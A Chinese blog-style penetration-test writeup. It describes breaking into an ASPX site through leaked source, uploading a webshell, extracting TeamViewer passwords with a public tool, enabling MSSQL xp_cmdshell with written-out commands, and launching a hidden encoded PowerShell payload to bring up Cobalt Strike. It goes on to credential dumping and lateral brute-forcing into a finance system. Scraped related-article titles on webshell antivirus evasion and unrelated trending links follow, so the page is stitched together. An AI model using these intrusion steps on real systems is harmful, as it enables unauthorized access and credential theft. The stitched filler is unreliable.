通过前期信息搜集获取到目标站的80xx端口

发现一处源码泄露
查看配置文件

登录manage.aspx

上传shell
发现安装了TeamViewer

看下进程如果运行tv的话,可直接读取其远程的账号密码
https://github.com/uknowsec/SharpDecryptPwd
SharpDecryptPwd

对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)。

本地演示如下

翻找文件,jar包反编译,获取到数据库账号密码和redis密码

由于shell不是system权限,且存在多个杀软。

利用免杀frp代理,利用数据库提权

xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。

开启xp_cmdshell

execsp_configure 'show advanced options', 1;reconfigure;

execsp_configure 'xp_cmdshell',1;reconfigure;

添加用户并添加到管理员组

由于装了天q,新添加的用户无法登录。

那么利用数据库执行命令,上线cs

cmdshell执行时需要编码一下

EXEC master.dbo.xp_cmdshell 'powershell.exe -nop -w hidden -enc xxxxxxxxxxxxxxxxxxxxxxx'

上线cs,抓取密码

利用获取的密码进行横向爆破

发现多台服务器桌面存在密码本和连接生产系统的Anydesk

财务系统

内网没有域,就搞搞数据库和系统了。

shell 免杀aspx_记一次aspx网站渗透相关推荐

  1. shell 免杀aspx_对于asp免杀webshell的一些总结

    0x00 前言 现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章 偷偷介绍下公众号:404安全 0x ...

  2. shell 免杀aspx_避开eval关键字,打造免杀一句话木马

    这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢? 首先我想到的是将eval从字符串类型赋给一个变量. ...

  3. shell 免杀aspx_asp免杀webshell木马总结

    0x00 前言 asp免杀webshell木马总结 简单的介绍下asp的免杀,相对于php我们的asp还是不够灵活. 0x01 目录 数组 函数 加密 注释符 类 字符串操作 0x02 了解asp一句 ...

  4. shell 免杀aspx_webshell免杀套路

    0x01 前言 尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧 0x02 目录关于eval 与 assert 字符串变形 定义函数绕过 回调函数 回调函数变形 特殊字符干扰 数组 类 ...

  5. shell 免杀aspx_Webshell免杀

    一句话木马 在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合.如果出现某种WAF防护,就寻找一个免杀的大马挂马. 最常见的php一句话木马<?php   @eval($_POST['x ...

  6. 云锁 php一句话,关于php一句话免杀的分析转载

    一开始想这样:   <?php $_GET['ts7']($_POST['cmd']);?> 客户端用菜刀,密码cmd,url为test.php?ts7=assert   这个应该算没有什 ...

  7. Kail Linux渗透测试教程之免杀Payload生成工具Veil

    Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用M ...

  8. 记一次PowerShell免杀实战

    最近在玩免杀,发现了一些免杀思路,今天来给大家做个分享,希望可以帮到大家. 0x01 powershell 加载 shellcode 介绍 UNIX 系统一直有着功能强大的壳程序(shell),Win ...

  9. Veil生成免杀payload 渗透win10 获取靶机shell

    一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...

最新文章

  1. 线性代数:05 实对称矩阵与二次型
  2. linux arch 软件管理工具 pacman 简介
  3. pyotrch nn.Conv2d中groups参数的理解
  4. SpringBoot配置Mybatis在控制台打印sql
  5. php中mb substr,php中中文截取函数mb_substr()详细
  6. js localdate上一个月_moment.js格式化日期,获取前一个月的时间
  7. java webrtc ns降噪_单独编译和使用webrtc音频降噪模块(附完整源码+测试音频文件)...
  8. SAP UI5 sap.viz.ui5.controls.VizFrame 的 aggregation 之一:dataset
  9. Android之设置横屏竖屏
  10. win11白屏死机怎么办 Windows11白屏死机的解决方法
  11. 1次订单事故,扣了我3个月绩效!
  12. 10074 启用开发者模式 for vs2015rc
  13. 解决办法:无法修正错误,因为您要求某些软件包保持现状,就是它们破坏了软件包间的依赖关系。
  14. Linux中不同文字颜色代表的含义
  15. 推荐系统序列化建模总结
  16. 基于纹理的印章识别分离——发票识别之一
  17. 【Cheatsheet】Java的常用代码(以及eclipse技巧)
  18. Java 多态的薪酬计算的练习
  19. 领先大厂股价大跌,半导体行业形势不妙
  20. 什么是前端渲染和后端渲染和SPA页面

热门文章

  1. MongoDB更新文档(非常详细,不要错过~)
  2. java找出最高工资和下标_Java 8 lambda用于为每个部门选择最高薪资员工
  3. 查看从库mysql同步错误日志_常见MySQL同步错误恢复方法
  4. 我的开源项目:FLV封装格式分析器
  5. postmapping注解参数说明_这么写参数校验(validator)就不会被劝退了~
  6. matlab 矩阵jocobi迭代_计算方法实验指导书1 -
  7. 【服务器】【私有云】宝塔安装KodExplorer
  8. 【codevs1295】N皇后问题
  9. 【Luogu1048】采药
  10. 知道cve编号怎么搜poc_想在海南买房不知道该怎么选?快来看看这些热搜楼盘吧!...